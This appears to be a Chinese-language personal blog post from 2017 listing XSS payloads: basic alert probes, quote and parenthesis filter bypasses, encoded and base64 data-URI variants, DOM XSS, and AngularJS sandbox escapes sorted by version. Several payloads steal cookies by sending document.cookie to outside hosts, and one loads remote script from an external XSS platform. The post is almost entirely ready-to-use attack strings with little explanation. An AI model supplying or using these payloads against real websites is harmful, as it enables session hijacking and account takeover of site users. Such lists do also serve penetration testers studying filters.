NEKO

xss-payload

2017/12/30

xss转码工具:https://www.toolmao.com/xsstranser
或者用hackbar转

payload大全:
http://www.zbojia.com/index.php/archives/27/

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
playload:
<script>alert(document.cookie)</script> cookie
<script>alert(navigator.userAgent)</script>客户端信息

常规的playload:
<script>alert("xss")</script>
<script>alert("xss");</script>

<script>alert(/xss/) 绕过双引号过滤 //绕过双引号过滤,``绕过括号过滤

"-alert`1`-" 这两个""是闭合别的",如果有的话

"><img src=`x` onerror=alert(/xxx/)> x用`,',或不加都试一试

"><body onload=alert(1)><"

"><svg onload=alert(1)><"

"><a href=javascript:alert(/xx/)>click me</a><"

"><div onclick=alert('xss')>click me<"

" type=image src=x onerror=alert(1) " 这个要在input里面,注意"和type之间有空格

"><body onload=alert`1`><" 过滤()

"%3e%3cscript%3ealert(document.cookie)%3c/script%3e

%00”><script>alert(document.cookie)</script>

"><video> <source onerror="javascript:alert(1)">



<a herf=”data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+”>Click</a>



绕过magic_quotes_gpc=on
<script>String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59)</script>
用/代替过滤space

回旋镖:
<a herf="javascript:alert(/xss/)">xss</a> 这里用/而不是"的原因是防止和前面的"闭合
dom:(url) 由浏览器执行,源码无痕迹,更难防御
dom.html#<script>alert("xss")</script>
ddos:
<iframe src=http://127.0.0.1 width=100 height=100></iframe>

eval加密alert
<script>eval("alert(/xss/)")</script> 双引号可用js16进制,unicode换码等方式转换
<script>eval(String.fromCharCode(97,108,....))</script>

<object data="data:text/html;base64,这里放上面payload的b64> </object>

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=> </object>

反射型xss:
<img/src=1 onerror=(function(){window.s=document.createElement(script);window.s.src=http://xss.ezsec.org/?u=caed9c;document.body.appendChild(window.s)})()>

alert() 弹出个提示框 (确定)
confirm() 弹出个确认框 (确定,取消)
prompt() 弹出个输入框 让你输入东西


窃cookie:
<script>var img=document.createElement("img");img.src = "http://hack.com/xss.js?" + escape(document.cookie);document.body.appendChild(img);</script>

html-context XSS:http://xsst.sinapp.com/example/1-1.php?page=<script>location.href='http://xsst.sinaapp.com/example/evil.php?cookie='+encodeURIComponent(document.cookie)</script>

下面是一些 AngularJS 绕过的 Payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79

1.0.1 - 1.1.5

{{constructor.constructor('alert(1)')()}}
1.2.0 - 1.2.1

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5

{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
1.2.6 - 1.2.18

{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23

{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29

{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
1.3.0

{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
1.3.1 - 1.3.2

{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
1.3.3 - 1.3.18

{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
1.3.19

{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
1.3.20

{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9

{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8

{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}} ---->没有测试成功
{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,alert(42),a')}}');}} 此条在liveoverflow.com测试成功
1.5.9 - 1.5.11

{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}

<>被转义:
可以利用事件属性

1
<input type="text" name="..." value="" onmouseover="alert(document.domain)">

如果””被过滤,那得看这里value用””了没有,没用的话还是可以用的.

1
<input type="text" name="..." value=1 onmouseover=alert(document.domain)>

原文作者: n3k0

发表日期: December 30th 2017, 1:05:38

发出嘶吼: 没有魔夜2玩我要死了

CATALOG